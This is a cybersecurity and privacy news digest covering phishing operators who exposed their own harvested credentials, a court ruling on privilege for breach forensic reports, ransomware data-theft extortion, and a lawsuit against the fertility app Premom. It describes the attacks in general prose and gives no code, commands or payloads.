At a glance.
- Criminals have accidental data exposures, too.
- Forensic reports and attorney-client privilege.
- Extortion continues to pay.
- Fertility app sued for sharing data with third parties in China.
Phishing scammers accidentally expose harvested data.
Security Week reports that cybercriminals inadvertently exposed their bounty on the web after a phishing scam. Researchers at security vendor CheckPoint explain how, starting in August of last year, threat actors executed a phishing campaign that compromised the data of over one thousand corporate employees. The phishing emails were disguised as Xerox scan notifications containing a malicious HTML attachment. When the victim attempted to open the document, Javascript code was triggered to perform passcode checks and send the data to the attackers’ server. By eluding Microsoft Office 365 Advanced Threat Protection (ATP) filters, the campaign allowed the cybercriminals to harvest credential data from thousands of organizations. What the attackers apparently didn’t realize was that the server storing the stolen data was accessible to the public with just a simple Google search. The researchers notified Google of the issue and have advised victims to use Google search capabilities to determine if their credentials were exposed.
We received some comments on the incident from Saryu Nayyar, CEO of Gurucul, who notes that the criminals, for all their slovenly opsec, still went undetected for several months:
“The report of malicious actors having their stolen user IDs and passwords revealed by a simple Google search is Karma in action. It shows that attackers are susceptible to the same sort of simple configuration errors that many of them leverage against their targets. But this case also shows that attackers can operate phishing schemes successfully for many months before they're exposed.
“Sadly, users often remain the weakest link in the security chain. While user education can help, organizations still need to maintain strong perimeter and interior defenses, including multi-factor authentication and security analytics, to resist intrusions when credentials are stolen through clever phishing or social engineering attacks.”
Chloé Messdaghi, Chief Strategist at Point3 Security, also commented. She thinks the criminals' selection of victims is interesting, and notes the growing plausibility of their phishbait:
“It’s interesting that they are targeting construction – that’s an industry that hasn’t received as much attention from attackers as other sectors. Usually, attackers are focused on healthcare, finance, energy, and retail – but those industries have certainly increased their investments in cybersecurity training over the last two years, so these attackers cleverly shifted to construction, where every initiative involves tens of millions or often hundreds of millions of dollars, and deadlines and regulatory requirements must be strictly adhered to.
“The attack approach was also clever: a fake login that already self-populates, so that most people wouldn’t be suspicious of the possibility of a phishing attack. Usually, when something self populates it’s viewed as legit and trusted. That’s why this campaign went undetected so often. They were clever but not clever enough, since they forgot to close their own server down and as a result, blew their chance to monetize their loot.
“We need to understand that these phishing attacks are getting more and more realistic, and the public needs to know that if they don’t consider their sector a target, it’s a very safe bet that it actually is.”
Are data breach forensic reports exceptions to privilege?
JD Supra reports that in the case of Wengui v. Clark Hill, a US District Court determined that work-product and attorney-client privileges were not sufficient to prevent the submission of cyberattack forensic reports. Law firm Clark Hill experienced a cyberattack in which the plaintiff, a former employee of the firm, was compromised. The plaintiff requested all investigative reports of the attack be produced, but the law firm contested this, asserting that the forensics reports were protected by work-product and attorney-client privilege. The court ruled in favor of the plaintiff, asserting that the reports were the result of an investigation of the cyberattack that would have been carried even without the lawsuit and included recommendations for improving the firm’s cybersecurity practices. The ruling is not the first of its sort to side with the plaintiff, and the decision raises the question of whether data breach investigation reports can be used against the targeted company in court. Law360 offers advice on how organizations can protect these reports going forward, and their suggestions include using a cybersecurity firm with no previous ties to the defendant, reserving their report for litigation purposes only, and avoiding inclusion of suggestions for remediation.
Extortion tactics force ransomware targets to pay.
ZDNet reports that a recent trend in ransomware campaigns has victims paying up, even if they have their data backed up. As an added incentive to pay the ransom, in addition to encrypting the target’s data, threat actors are also stealing and threatening to publish sensitive data. The ransomware gang Maze was the first to use this tactic, but now seventeen other groups have started employing the strategy. Cybersecurity company Emsisoft remarked in their 'State of Ransomware' report, “Like legitimate businesses, criminal enterprises adopt strategies that are proven to work, and data theft has indeed been proven to work.”
Premom sued for sharing data with Chinese third parties.
A putative class action lawsuit has been leveled at fertility app Premom, which is accused of sharing user data with Chinese data collectors, reports Law360. The plaintiff asserts she and fellow users were deceived by the app’s privacy terms and that the data were shared without user consent. This is not the first time Premom’s policies have been called into question. Last August the International Digital Accountability Council discovered that the app was selling hardware identifiers and geographic data to third parties, and a Federal Trade Commission probe is under consideration as a result.